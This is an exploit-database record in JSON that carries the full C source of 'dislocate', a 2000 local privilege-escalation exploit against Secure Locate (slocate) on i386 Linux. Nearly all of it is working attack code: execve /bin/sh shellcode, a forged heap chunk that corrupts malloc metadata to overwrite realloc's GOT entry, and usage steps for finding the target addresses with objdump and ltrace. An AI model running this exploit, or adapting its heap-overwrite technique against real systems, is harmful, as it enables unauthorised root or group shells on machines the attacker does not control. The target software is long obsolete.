Description
Exploit for the Linux platform, listed in the "local exploits" category.
{"id": "1337DAY-ID-7265", "type": "zdt", "bulletinFamily": "exploit", "title": "dislocate - Local i386 exploit in v1.3", "description": "Exploit for linux platform in category local exploits", "published": "2000-12-02T00:00:00", "modified": "2000-12-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/7265", "reporter": "Michel Kaempf", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T03:05:48", "viewCount": 7, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/7265", "sourceData": "======================================\r\ndislocate - Local i386 exploit in v1.3\r\n======================================\r\n\r\n/*\r\n * MasterSecuritY <www.mastersecurity.fr>\r\n *\r\n * dislocate.c - Local i386 exploit in v1.3 < Secure Locate < v2.3\r\n * Copyright (C) 2000 Michel \"MaXX\" Kaempf <[email\u00a0protected]>\r\n *\r\n * Updated versions of this exploit and the corresponding advisory will\r\n * be made available at:\r\n *\r\n * ftp://maxx.via.ecp.fr/dislocate/\r\n *\r\n * This program is free software; you can redistribute it and/or modify\r\n * it under the terms of the GNU General Public License as published by\r\n * the Free Software Foundation; either version 2 of the License, or\r\n * (at your option) any later version.\r\n *\r\n * This program is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n * GNU General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program; if not, write to the Free Software\r\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define PATH \"/tmp/path\"\r\n\r\nchar *shellcode =\r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\r\n\r\nvoid usage( char * string )\r\n{\r\n fprintf( stderr, \"* Usage: %s filename realloc malloc\\n\", string );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Example: %s /usr/bin/slocate 0x0804e7b0 0x08050878\\n\", string );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Realloc:\\n\" );\r\n fprintf( stderr, \" $ objdump -R /usr/bin/slocate | grep realloc\\n\" );\r\n fprintf( stderr, \"\\n\" );\r\n fprintf( stderr, \"* Malloc:\\n\" );\r\n fprintf( stderr, \" $ %s foobar 0x12121212 0x42424242\\n\", string );\r\n fprintf( stderr, \" $ cp /usr/bin/slocate /tmp\\n\" );\r\n fprintf( stderr, \" $ ltrace /tmp/slocate -d %s foobar 2>&1 | grep 'malloc(64)'\\n\", PATH );\r\n fprintf( stderr, \" $ rm %s\\n\", PATH );\r\n fprintf( stderr, \"\\n\" );\r\n}\r\n\r\nint zero( unsigned int ui )\r\n{\r\n if ( !(ui & 0xff000000) || !(ui & 0x00ff0000) || !(ui & 0x0000ff00) || !(ui & 0x000000ff) ) {\r\n return( -1 );\r\n }\r\n return( 0 );\r\n}\r\n\r\nint main( int argc, char * argv[] )\r\n{\r\n unsigned int ui_realloc;\r\n unsigned int ui_malloc;\r\n char path[1337];\r\n char next[1337];\r\n char * execve_argv[] = { NULL, \"-d\", PATH, next, NULL };\r\n int fd;\r\n unsigned int p_next;\r\n unsigned int ui;\r\n\r\n if ( argc != 4 ) 
{\r\n usage( argv[0] );\r\n return( -1 );\r\n }\r\n execve_argv[0] = argv[1];\r\n ui_realloc = (unsigned int)strtoul( argv[2], NULL, 0 );\r\n ui_malloc = (unsigned int)strtoul( argv[3], NULL, 0 );\r\n\r\n strcpy( next, \"ppppssssffffbbbb\" );\r\n p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);\r\n for ( ui = 0; ui < p_next - (p_next & ~3); ui++ ) {\r\n strcat( next, \"X\" );\r\n }\r\n p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);\r\n\r\n ui = 0;\r\n *((unsigned int *)(&(next[ui]))) = (unsigned int)(-1);\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ((ui_malloc - 8) + 136) - p_next;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->size == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ui_realloc - 12;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->fd == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n *((unsigned int *)(&(next[ui]))) = ui_malloc;\r\n if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {\r\n fprintf( stderr, \"debug: next->bk == 0x%08x;\\n\", *((unsigned int *)(&(next[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui = 0;\r\n path[ui] = (char)(256 - 4);\r\n\r\n ui += 1;\r\n *((unsigned int *)(&(path[ui]))) = p_next - (ui_malloc - 8);\r\n if ( zero( *((unsigned int *)(&(path[ui]))) ) ) {\r\n fprintf( stderr, \"debug: oldp->size == 0x%08x;\\n\", *((unsigned int *)(&(path[ui]))) );\r\n return( -1 );\r\n }\r\n\r\n ui += 4;\r\n path[ui] = 0;\r\n strcat( path, \"\\xeb\\x0axxyyyyzzzz\" );\r\n strcat( path, shellcode );\r\n\r\n fd = open( PATH, O_WRONLY|O_CREAT|O_EXCL, S_IRWXU );\r\n if ( fd == -1 ) {\r\n fprintf( stderr, \"debug: open( \\\"%s\\\", O_WRONLY|O_CREAT|O_EXCL, S_IRWXU ) == -1;\\n\", PATH );\r\n return( -1 );\r\n }\r\n write( fd, \"0\", sizeof(\"0\") );\r\n write( fd, \"\", 
sizeof(\"\") );\r\n write( fd, path, strlen(path) );\r\n close( fd );\r\n\r\n execve( execve_argv[0], execve_argv, NULL );\r\n return( -1 );\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "_state": {"dependencies": 1647179039, "score": 1659766679, "epss": 1678811959}}
{}